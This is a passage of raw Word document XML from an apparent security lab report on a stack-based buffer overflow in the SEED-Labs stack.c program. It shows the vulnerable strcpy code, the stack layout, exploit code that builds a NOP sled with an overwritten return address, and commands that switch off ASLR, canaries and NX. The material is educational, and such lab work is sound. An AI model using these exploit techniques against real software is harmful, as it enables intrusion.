        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.9  Summary of defences</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551133 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E19C16E" w14:textId="216D11A8" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Part 3 - Red Team Engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551134 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1E5E93" w14:textId="0BAAF662" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.1  Scope and rules of engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551135 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="611ED710" w14:textId="70236736" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.2  Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551136 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D5A59" w14:textId="17A6EB9D" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.3  Scanning and enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551137 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F00ADC" w14:textId="7AAF658B" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.4  Exploitation (initial access)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551138 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD5D96" w14:textId="26AA075D" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.5  Privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551139 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="175BF7CC" w14:textId="081B7E6A" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.6  Post-exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551140 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3DF858" w14:textId="5F097BD0" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.7  Reporting and remediation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242551141 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C621807" w14:textId="6A6D1A63" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F36D0A2" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49462A13" w14:textId="24EEC7B2" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc242551116"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 1 - Stack-Based Buffer Overflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1535B106" w14:textId="47D4F93D" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc242551117"/>
      <w:r>
        <w:t>1.1  Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="1DD643AB" w14:textId="42C2D95D" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>The task is to exploit a deliberately vulnerable C program (stack.c) using a classic stack-based buffer overflow: overflow a fixed-size local buffer, overwrite the saved return address on the stack, and redirect execution into attacker-supplied shellcode that launches a shell. All work was performed on an isolated Ubuntu system running under WSL2 that I own, with modern memory protections deliberately disabled for the exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6834F6" w14:textId="64C4761D" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc242551118"/>
      <w:r>
        <w:t>1.2  Why the program is vulnerable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="362CCA9C" w14:textId="6F659743" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>The vulnerable function copies attacker-controlled data into a 12-byte stack buffer using strcpy(), which performs no bounds checking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA53261" w14:textId="119E0C7F" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int bof(char *str) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    char buffer[12];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    strcpy(buffer, str);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return 1;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>int main() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    char input[517];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    FILE *badFile = fopen("badfile", "r");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    fread(input, sizeof(char), 517, badFile);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    fclose(badFile);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    bof(input);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    printf("Returned Properly\n");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return 1;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F041BC" w14:textId="6A13C5B8" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>strcpy() keeps copying until it reaches a NUL byte. Because main() hands bof() up to 517 bytes read straight from badfile, the copy runs past the end of the 12-byte buffer and overwrites, in order: the buffer, the saved frame pointer (RBP), and the saved return address. Whoever controls the saved return address controls where the CPU jumps when bof() executes its ret instruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3BC18D" w14:textId="417D136B" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc242551119"/>
      <w:r>
        <w:t>1.3  Stack layout and payload design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="2AB29C38" w14:textId="211FC76B" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>The stack grows downward, but strcpy() writes upward from the start of the buffer, which is exactly what lets a forward copy clobber the return address sitting above the buffer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C393183" w14:textId="7D121DFA" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  higher addresses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  +----------------------------+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  |  saved RETURN ADDRESS (8B) |  payload offset 20..27   &lt;= overwritten</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  +----------------------------+        with an address inside the NOP sled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  |  saved RBP            (8B) |  payload offset 12..19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  +----------------------------+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  |  buffer[12]               |  payload offset 0..11    &lt;= strcpy starts here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  +----------------------------+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  lower addresses     (strcpy writes upward, toward the return address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD99D0" w14:textId="40B9407C" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>The 517-byte payload (badfile) is filled entirely with NOP (0x90) instructions, the shellcode is placed near the end, and the saved return address at offset 20 is overwritten with an address that lands somewhere inside the NOP sled. A wide sled means precise addressing is not required: execution lands in the sled and slides down into the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DDCBE7" w14:textId="057A2EA7" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>memset(buffer, 0x90, 517);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>int scLen = sizeof(shellCode) - 1;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>int start = 517 - scLen - 10;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>memcpy(buffer + start, shellCode, scLen);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>unsigned long ret = 0x7fffffffe594;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>*(unsigned long *)(buffer + 20) = ret;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6715ACC8" w14:textId="45925397" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The shellcode is the standard SEED-Labs x86-64 execve("/bin/sh") stub; the learning objective of this task is the stack-layout and offset reasoning, so the shellcode is treated as an opaque, provided payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D1227" w14:textId="064E49DF" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc242551120"/>
      <w:r>
        <w:t>1.4  Disabling protections (lab only)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0BEFAA38" w14:textId="0461ED28" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>The vulnerable program is compiled with the three defenses that normally stop this class of attack switched off, and ASLR is disabled so stack addresses are stable between runs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D548C" w14:textId="7E7D388E" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sudo sysctl -w kernel.randomize_va_space=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>gcc -g -fno-stack-protector -z execstack -no-pie -o stack stack.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>gcc -o exploit exploit.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>./exploit      # writes ./badfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>./stack        # overflow -&gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633ECC1" w14:textId="610E7417" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Each disabled defense maps to a real-world protection: -fno-stack-protector removes the stack canary (StackGuard); -z execstack makes the stack executable, defeating NX/DEP; -no-pie fixes the load address, standing in for PIE + ASLR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485333AE" w14:textId="3AF26FDB" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc242551121"/>
      <w:r>
        <w:t>1.5  Execution and proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4AD70CDB" w14:textId="401C7F72" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20521999" wp14:editId="52748101">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="142820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20370"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5294D9F0" w14:textId="754140A3" w:rsidR="00A65037" w:rsidRDefault="005D3D8D" w:rsidP="005D3D8D">
      <w:r w:rsidRPr="005D3D8D">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73464730" wp14:editId="0809A666">
            <wp:extent cx="5731510" cy="3956685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="514332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332788" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3956685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5347AB" w14:textId="67F17390" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
